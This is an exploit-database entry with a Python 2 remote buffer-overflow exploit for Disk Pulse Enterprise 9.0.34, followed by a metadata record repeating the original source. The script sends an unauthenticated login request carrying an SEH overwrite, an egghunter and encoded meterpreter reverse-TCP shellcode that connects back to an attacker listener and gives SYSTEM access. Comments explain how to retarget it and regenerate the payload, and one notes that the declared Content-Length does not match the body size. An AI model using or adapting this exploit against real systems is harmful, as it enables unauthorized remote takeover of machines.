ID 1337DAY-ID-25323
Type zdt
Reporter Tulpa
Modified 2016-10-04T00:00:00
Description
Remote exploit for the Windows platform (category: remote exploits)
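#!/usr/bin/env python2
# Python 2 only: the request below is assembled as a raw-byte "str" and
# handed straight to the socket, which Python 3 rejects. The explicit
# python2 shebang keeps a modern /usr/bin/python (= 3.x) from tripping on it.
print("Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit")
print("Author: Tulpa // tulpa[at]tulpa-security[dot]com")
#Author website: www.tulpa-security.com
#Author twitter: @tulpa-security.com
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swap out the target IP and the shellcode, and remember to adjust the
#'\x41' filler count when the shellcode size changes. The reverse-shell
#callback address is baked into the shellcode bytes (see the msfvenom
#line below), so regenerate it rather than only editing the target IP.
#Tested on Windows 7 x86 Enterprise SP1
#Greetings to ozzie_offsec and carbonated
#Special Shoutout to unfo- for making me look closer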
import socket
import sys
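# Target of the POST. The Host: header further down repeats this address,
# so change both together when retargeting.
target = ('192.168.123.132', 80)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bound connect()/send() so a filtered port or a wedged service fails
# loudly with socket.timeout instead of hanging the script indefinitely.
s.settimeout(10)
# The return value of connect() is always None; the old `connect=` binding
# was never read, so it is dropped.
s.connect(target)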
# Bad characters for this input: \x00 \x0a \x0d \x26
# (NUL, LF, CR and '&' -- the form-field separator).
#
# Shellcode generated with:
#   msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#
# 308 bytes. LHOST/LPORT are encoded inside these bytes, so when the
# listener moves, regenerate the blob -- do not just edit the target IP.
# Any size change must be mirrored in the '\x41' filler count below.
buf = (
    "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
    "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
    "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
    "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
    "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
    "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
    "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
    "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
    "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
    "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
    "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
    "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
    "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
    "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
    "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
    "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
    "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
    "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
    "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
    "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
    "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
    "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
    "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
    "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
)
# SEH overwrite. nSEH = two NOPs then "jmp short +0x0b" (EB 0B): from the
# end of nSEH that hops over the 4-byte handler address and lands inside
# the 20-NOP pad that precedes the egghunter.
nseh = "\x90\x90" + "\xeb\x0b"
# SEH = pop/pop/ret gadget at 0x1001A333, little-endian.
seh = "\x33\xa3\x01\x10"
# 32-byte egghunter: walks memory page by page, probing each page with an
# int 0x2e syscall (eax = 2) and skipping pages that fault, looking for
# the 8-byte egg "w00tw00t" ("\x77\x30\x30\x74" == "w00t"). It relies on
# the 32-bit int 0x2e entry path -- fine for the Win7 x86 target this was
# tested on; presumably not usable as-is in an x64 process, verify before reuse.
egghunter = (
    "\x66\x81\xca\xff\x0f"  # or dx, 0x0fff   -> end of current page
    "\x42"                  # inc edx         -> start of next page
    "\x52"                  # push edx
    "\x6a\x02"              # push 2
    "\x58"                  # pop eax         -> syscall number 2
    "\xcd\x2e"              # int 0x2e
    "\x3c\x05"              # cmp al, 5       -> 0x05: low byte of STATUS_ACCESS_VIOLATION
    "\x5a"                  # pop edx
    "\x74\xef"              # je  (next page)
    "\xb8\x77\x30\x30\x74"  # mov eax, "w00t"
    "\x8b\xfa"              # mov edi, edx
    "\xaf"                  # scasd           -> first half of the egg
    "\x75\xea"              # jne (next addr)
    "\xaf"                  # scasd           -> second half of the egg
    "\x75\xe7"              # jne (next addr)
    "\xff\xe7"              # jmp edi         -> into the shellcode
)
# Body layout (offsets are from the start of the POST body as built here):
#   0      username/password fields, 31 bytes incl. the CRLF ending the field
#   31     12292 x 'A' filler
#   12323  8-byte egg "w00tw00t", 20 NOPs, then the 308-byte shellcode
#   14323  nSEH (after 50 NOPs + 1614 x 'B'), SEH at 14327
#   14331  20 NOPs, the 32-byte egghunter, 7000 trailing NOPs
# NOTE(review): Content-Length says 17000 while the body assembled here is
# 21383 bytes. The author reports the PoC working as-is, so leave the
# header alone unless you also re-verify the crash after resizing the filler.
# The Host: header repeats the connect() address -- change both together.
headers = [
    "POST /login HTTP/1.1",
    "Host: 192.168.123.132",
    "User-Agent: Mozilla/5.0",
    "Connection: close",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-us,en;q=0.5",
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Keep-Alive: 300",
    "Proxy-Connection: keep-alive",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: 17000",
]
body = "".join([
    "username=admin",
    "&password=aaaaa\r\n",
    "\x41" * 12292,      # subtract/add here when the shellcode size changes
    "w00tw00t",          # egg the hunter scans for
    "\x90" * 20,
    buf,
    "\x90" * 50,
    "\x42" * 1614,
    nseh,
    seh,
    "\x90" * 20,
    egghunter,
    "\x90" * 7000,
])
evil = "\r\n".join(headers) + "\r\n\r\n" + body
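print('Sending evil buffer...')
try:
    # sendall() loops until the whole 20 KB+ request has been handed to
    # the kernel. A bare send() may return after a partial write, which
    # would silently truncate the overflow and leave the SEH chain intact.
    s.sendall(evil)
    print('Payload Sent!')
finally:
    # Close on every path so a failed or timed-out send does not leak the socket.
    s.close()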
# 0day.today [2018-01-01] #
{"published": "2016-10-04T00:00:00", "id": "1337DAY-ID-25323", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for windows platform in category remote exploits", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-01-01T23:01:26", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-01T23:01:26", "rev": 2}, "vulnersScore": 0.0}, "type": "zdt", "lastseen": "2018-01-01T23:01:26", "edition": 2, "title": "Disk Pulse Enterprise 9.0.34 - Buffer Overflow Exploit", "href": "https://0day.today/exploit/description/25323", "modified": "2016-10-04T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": [], "sourceHref": "https://0day.today/exploit/25323", "references": [], "reporter": "Tulpa", "sourceData": "#!/usr/bin/python\r\n \r\nprint \"Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit\"\r\nprint \"Author: Tulpa // tulpa[at]tulpa-security[dot]com\"\r\n \r\n#Author website: www.tulpa-security.com\r\n#Author twitter: @tulpa-security.com\r\n \r\n#Exploit will land you NT AUTHORITY\\SYSTEM\r\n#You do not need to be authenticated, password below is garbage\r\n#Swop out IP, shellcode and remember to adjust '\\x41' for bytes\r\n#Tested on Windows 7 x86 Enterprise SP1\r\n \r\n#Greetings to ozzie_offsec and carbonated\r\n#Special Shoutout to unfo- for making me look closer\r\n \r\nimport socket\r\nimport sys\r\n \r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nconnect=s.connect(('192.168.123.132',80))\r\n \r\n#bad chars \\x00\\x0a\\x0d\\x26\r\n \r\n#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\\x00\\x0a\\x0d\\x26' -f python --smallest\r\n \r\n#payload size 308\r\n \r\nbuf = \"\"\r\nbuf += \"\\xda\\xd9\\xba\\x43\\x1b\\x3f\\x40\\xd9\\x74\\x24\\xf4\\x58\\x2b\"\r\nbuf += \"\\xc9\\xb1\\x47\\x31\\x50\\x18\\x03\\x50\\x18\\x83\\xc0\\x47\\xf9\"\r\nbuf += 
\"\\xca\\xbc\\xaf\\x7f\\x34\\x3d\\x2f\\xe0\\xbc\\xd8\\x1e\\x20\\xda\"\r\nbuf += \"\\xa9\\x30\\x90\\xa8\\xfc\\xbc\\x5b\\xfc\\x14\\x37\\x29\\x29\\x1a\"\r\nbuf += \"\\xf0\\x84\\x0f\\x15\\x01\\xb4\\x6c\\x34\\x81\\xc7\\xa0\\x96\\xb8\"\r\nbuf += \"\\x07\\xb5\\xd7\\xfd\\x7a\\x34\\x85\\x56\\xf0\\xeb\\x3a\\xd3\\x4c\"\r\nbuf += \"\\x30\\xb0\\xaf\\x41\\x30\\x25\\x67\\x63\\x11\\xf8\\xfc\\x3a\\xb1\"\r\nbuf += \"\\xfa\\xd1\\x36\\xf8\\xe4\\x36\\x72\\xb2\\x9f\\x8c\\x08\\x45\\x76\"\r\nbuf += \"\\xdd\\xf1\\xea\\xb7\\xd2\\x03\\xf2\\xf0\\xd4\\xfb\\x81\\x08\\x27\"\r\nbuf += \"\\x81\\x91\\xce\\x5a\\x5d\\x17\\xd5\\xfc\\x16\\x8f\\x31\\xfd\\xfb\"\r\nbuf += \"\\x56\\xb1\\xf1\\xb0\\x1d\\x9d\\x15\\x46\\xf1\\x95\\x21\\xc3\\xf4\"\r\nbuf += \"\\x79\\xa0\\x97\\xd2\\x5d\\xe9\\x4c\\x7a\\xc7\\x57\\x22\\x83\\x17\"\r\nbuf += \"\\x38\\x9b\\x21\\x53\\xd4\\xc8\\x5b\\x3e\\xb0\\x3d\\x56\\xc1\\x40\"\r\nbuf += \"\\x2a\\xe1\\xb2\\x72\\xf5\\x59\\x5d\\x3e\\x7e\\x44\\x9a\\x41\\x55\"\r\nbuf += \"\\x30\\x34\\xbc\\x56\\x41\\x1c\\x7a\\x02\\x11\\x36\\xab\\x2b\\xfa\"\r\nbuf += \"\\xc6\\x54\\xfe\\x97\\xc3\\xc2\\xc1\\xc0\\xb7\\x92\\xaa\\x12\\x48\"\r\nbuf += \"\\x83\\x76\\x9a\\xae\\xf3\\xd6\\xcc\\x7e\\xb3\\x86\\xac\\x2e\\x5b\"\r\nbuf += \"\\xcd\\x22\\x10\\x7b\\xee\\xe8\\x39\\x11\\x01\\x45\\x11\\x8d\\xb8\"\r\nbuf += \"\\xcc\\xe9\\x2c\\x44\\xdb\\x97\\x6e\\xce\\xe8\\x68\\x20\\x27\\x84\"\r\nbuf += \"\\x7a\\xd4\\xc7\\xd3\\x21\\x72\\xd7\\xc9\\x4c\\x7a\\x4d\\xf6\\xc6\"\r\nbuf += \"\\x2d\\xf9\\xf4\\x3f\\x19\\xa6\\x07\\x6a\\x12\\x6f\\x92\\xd5\\x4c\"\r\nbuf += \"\\x90\\x72\\xd6\\x8c\\xc6\\x18\\xd6\\xe4\\xbe\\x78\\x85\\x11\\xc1\"\r\nbuf += \"\\x54\\xb9\\x8a\\x54\\x57\\xe8\\x7f\\xfe\\x3f\\x16\\xa6\\xc8\\x9f\"\r\nbuf += \"\\xe9\\x8d\\xc8\\xdc\\x3f\\xeb\\xbe\\x0c\\xfc\"\r\n \r\n#pop pop ret 1001A333\r\n \r\nnseh = \"\\x90\\x90\\xEB\\x0B\"\r\nseh = \"\\x33\\xA3\\x01\\x10\"\r\n \r\negghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\negghunter += 
\"\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n \r\n \r\nevil = \"POST /login HTTP/1.1\\r\\n\"\r\nevil += \"Host: 192.168.123.132\\r\\n\"\r\nevil += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nevil += \"Connection: close\\r\\n\"\r\nevil += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\nevil += \"Accept-Language: en-us,en;q=0.5\\r\\n\"\r\nevil += \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\nevil += \"Keep-Alive: 300\\r\\n\"\r\nevil += \"Proxy-Connection: keep-alive\\r\\n\"\r\nevil += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\nevil += \"Content-Length: 17000\\r\\n\\r\\n\"\r\nevil += \"username=admin\"\r\nevil += \"&password=aaaaa\\r\\n\"\r\nevil += \"\\x41\" * 12292 #subtract/add for payload\r\nevil += \"w00tw00t\"\r\nevil += \"\\x90\" * 20\r\nevil += buf\r\nevil += \"\\x90\" * 50\r\nevil += \"\\x42\" * 1614\r\nevil += nseh\r\nevil += seh\r\nevil += \"\\x90\" * 20\r\nevil += egghunter\r\nevil += \"\\x90\" * 7000\r\n \r\nprint 'Sending evil buffer...'\r\ns.send(evil)\r\nprint 'Payload Sent!'\r\ns.close()\n\n# 0day.today [2018-01-01] #"}
{}